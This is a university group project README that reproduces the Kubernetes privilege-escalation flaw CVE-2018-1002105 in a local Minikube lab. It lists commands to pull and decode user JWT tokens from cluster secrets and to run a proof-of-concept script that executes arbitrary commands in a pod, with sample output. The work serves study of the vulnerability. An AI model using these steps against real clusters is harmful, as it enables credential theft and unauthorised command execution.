CMPT733-Group11(0x90)
CVE-2018-1002105
Members: Abhishek Rungta, Shubham Saini, Siddhant Sood
Environment Setup
- A linux VM (Such as Ubuntu 20.04)
- Minikube for local deploymnet of kubernetes
- Any of these older versions(1.0.x— 1.9.x, 1.10.0—1.10.10,1.11.0—1.11.4,1.12.0—1.12.2)
Run the exploit
We have provided a virtual box image (.ova file) Download it and create a VM from it. The ova provided is pre configured with docker v18.09 and minikube v1.9.0
Build the kubernetes cluster
As our virtual image already has minkube and the required kubernetes versions just run the following command to start minikube
minikube start --kubernetes-version=v1.12.2
Create new user, namespace and assign role
Create a new user and a namespace and assign RBAC role to the user created using the followig command.
kubectl apply -f fixing_policy.yml
Remove access to conntract
kubectl edit configmaps kube-proxy --namespace=kube-system
Change the set maxPerCore to 0
Get the JWT token
First run the following command to get all the jwt tokens stored in the system
kubectl get secrets -A
To get the secret of the particular user created run the following command:
kubectl -n [namespace] get secrets [user-token] -o json
Then base64 decode it.
export TOKEN=$(echo TOKEN | base64 -d)
echo $TOKEN
Get the IP address and port No.
kubectl cluster-info
To deploy the pod
kubectl run --image=nginx:alpine securenginx -n poc
Run the POC
Specify all the required arguments:
-t for the target> ip:port (required)
-j for the JWT token of the user (required)
-p for pod (required)
-n for the namespace
-m for the method (required)
-c for the container
-x for the attacker command
Test case
Input
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0"
Output
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:217603 (212.5 KiB) TX bytes:428778 (418.7 KiB)
{"metadata":{},"status":"Success"}
Video Demo
Demo video link